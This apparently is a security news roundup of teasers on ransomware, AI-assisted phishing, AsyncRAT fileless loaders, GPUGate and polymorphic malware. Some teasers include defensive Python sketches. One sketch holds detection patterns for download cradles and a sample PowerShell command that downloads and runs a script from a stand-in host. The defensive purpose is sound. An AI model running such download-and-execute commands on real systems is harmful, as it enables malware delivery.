
Ransomware Techniques Are Changing. Are MSPs Ready for This Shift?

Ransomware is evolving, not fading. Despite a decline in attack detections based on WatchGuard Firebox telemetry, data from extortion sites and media reporting tells a different story: ransomware activity is actually on the rise, both quarter-over-quarter and year-over-year. The number of active ransomware groups is also increasing, as is the average ransom demand. In fact, the typical payout jumped from $400,000 in 2023 to $2 million in 2024, a staggering fivefold increase.

Report: AI-Powered Phishing Fuels Ransomware Losses

AI-powered social engineering attacks are significantly more successful than traditional attacks, according to a new report from cyber risk management firm Resilience. The researchers state, “Social engineering attacks fueled 88% of material losses, with AI-powered phishing achieving a 54% success rate compared to just 12% for traditional attempts.” AI allows attackers to easily craft sophisticated phishing emails, as well as voice and video deepfakes.

AsyncRAT in Action: Fileless Malware Techniques and Analysis of a Remote Access Trojan

Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate. A recent incident culminated in the deployment of AsyncRAT, a powerful Remote Access Trojan (RAT), through a multi-stage fileless loader. In this blog, we share some of the key takeaways from this investigation.
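
To make that detection challenge concrete, here is a minimal, hypothetical sketch of the idea behind behavior-based checks: flagging process command lines that carry common fileless-execution indicators such as encoded PowerShell or in-memory download cradles. The patterns and sample data below are illustrative assumptions, not signatures from the AsyncRAT investigation.

```python
import re

# Illustrative indicators often associated with fileless execution
# (encoded PowerShell, in-memory download cradles, LOLBin abuse).
# These patterns are assumptions for demonstration, not tuned detections.
SUSPICIOUS_PATTERNS = [
    re.compile(r"powershell.*-enc(odedcommand)?\s", re.IGNORECASE),
    re.compile(r"iex\s*\(.*downloadstring", re.IGNORECASE),
    re.compile(r"mshta\s+https?://", re.IGNORECASE),
    re.compile(r"rundll32\s+javascript:", re.IGNORECASE),
]

def flag_command_line(cmdline: str) -> bool:
    """Return True if the command line matches any fileless-style indicator."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)

if __name__ == "__main__":
    # Hypothetical process command lines, e.g. pulled from EDR telemetry.
    samples = [
        'powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4A...',
        'powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")',
        'notepad.exe C:\\Users\\demo\\notes.txt',
    ]
    for cmd in samples:
        print("SUSPICIOUS" if flag_command_line(cmd) else "ok", "-", cmd[:60])
```

In practice a check like this would run against live process-creation telemetry from an EDR rather than a hard-coded list, since in-memory loaders rarely leave anything on disk to scan.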

Intel Chat: Salt Typhoon, Scattered Lapsus$ Hunters, WhatsApp compromise & AI-assisted attack [245]

Support our show by sharing your favorite episodes with a friend, subscribing, giving us a rating, or leaving a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform: API-first infrastructure for SecOps that lets you scale with confidence as your business grows.

How to Defend Against WormGPT-Driven Phishing and Malware

AI is unlocking new ways to work across industries. Nearly four in five CEOs are implementing or likely to implement generative AI to speed up innovation across their companies, and workers at every level are using GenAI to improve or expand their processes. Unfortunately, they aren’t the only ones embracing the power of AI. WormGPT was one of the best-known early examples of an AI that could create convincing social engineering attacks and build malware.

Less ransomware, same risk. How can it be prevented?

Just because ransomware attacks have decreased doesn't mean the risk has disappeared. Indeed, it remains one of the most disruptive threats to any organisation. Headlines can convey a false sense of relief: Ransomware attacks are down 15%, according to Verizon's latest DBIR report. But those of us who work in cybersecurity know that this doesn't tell the whole story, especially when the real issue isn't how often an attack occurs, but what happens when it does.

GPUGate Malware: Malicious GitHub Desktop Implants Use Hardware-Specific Decryption, Abuse Google Ads to Target Western Europe

On 19 August 2025, the Arctic Wolf Cybersecurity Operations Center (cSOC) uncovered and remediated a sophisticated delivery chain: a threat actor leveraged GitHub’s repository structure together with paid placements on Google Ads to funnel users toward a malicious download hosted on a lookalike domain. By embedding a commit‑specific link in the advertisement, the attackers made the download appear to originate from an official source, effectively sidestepping typical user scrutiny.
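
As a rough sketch of the defensive takeaway (not part of Arctic Wolf's write-up; the domains below are invented), exact hostname allowlisting is one simple way to catch lookalike download domains that survive a casual glance:

```python
from urllib.parse import urlparse

# Illustrative allowlist of hosts downloads are expected to come from.
OFFICIAL_HOSTS = {"github.com", "objects.githubusercontent.com"}

def is_official_download(url: str) -> bool:
    """True only if the URL's host exactly matches an allowlisted host.

    Exact matching matters: substring checks would wave through lookalikes
    such as 'github.com.downloads.example'.
    """
    host = (urlparse(url).hostname or "").lower()
    return host in OFFICIAL_HOSTS

if __name__ == "__main__":
    # Hypothetical links: one genuine GitHub URL, one lookalike domain.
    for link in [
        "https://github.com/desktop/desktop/releases/latest",
        "https://github.com.gitpage-download.example/GitHubDesktopSetup.exe",
    ]:
        print("official" if is_official_download(link) else "LOOKALIKE", "-", link)
```

Ad-delivered links deserve the same scrutiny as email links: what matters is the host the download actually comes from, not what the advertisement displays.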

Adversarial AI and Polymorphic Malware: A New Era of Cyber Threats

The state of cybersecurity has always been in flux, but the arrival of tools like ChatGPT heralded one of the most significant challenges for security teams in years. AI holds incredible potential for data processing and malware detection, but in the wrong hands, Large Language Models (LLMs) and other adversarial AI tools can be used to develop polymorphic malware that escapes detection, gains access to sensitive data, and poisons data sets.
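
To show in miniature why polymorphic code undermines signature matching, here is a purely illustrative sketch (the "payload" is a harmless string and the mutation is trivial): one byte of variation changes the file hash completely, which is why hash-only detection has to be paired with behavioral analysis.

```python
import hashlib
import os

def sha256_hex(data: bytes) -> str:
    """File-hash style signature over raw bytes."""
    return hashlib.sha256(data).hexdigest()

if __name__ == "__main__":
    # A harmless stand-in for a malicious payload.
    base_payload = b"print('hello from a pretend payload')"

    # A polymorphic engine would re-encode or re-pack each copy; here we
    # just append a few random bytes to mimic trivial per-sample variation.
    variant = base_payload + b"\x00" + os.urandom(4)

    print("base   :", sha256_hex(base_payload))
    print("variant:", sha256_hex(variant))
    print("hash signature still matches?", sha256_hex(base_payload) == sha256_hex(variant))

    # A behavior-oriented check (what the code does, not what it hashes)
    # is far more stable across such variants.
    print("behavior indicator present in both?",
          b"pretend payload" in base_payload and b"pretend payload" in variant)
```

Real polymorphic engines go much further, re-encrypting, inserting junk code, or rewriting with LLM assistance, but the lesson is the same: static fingerprints alone are not enough.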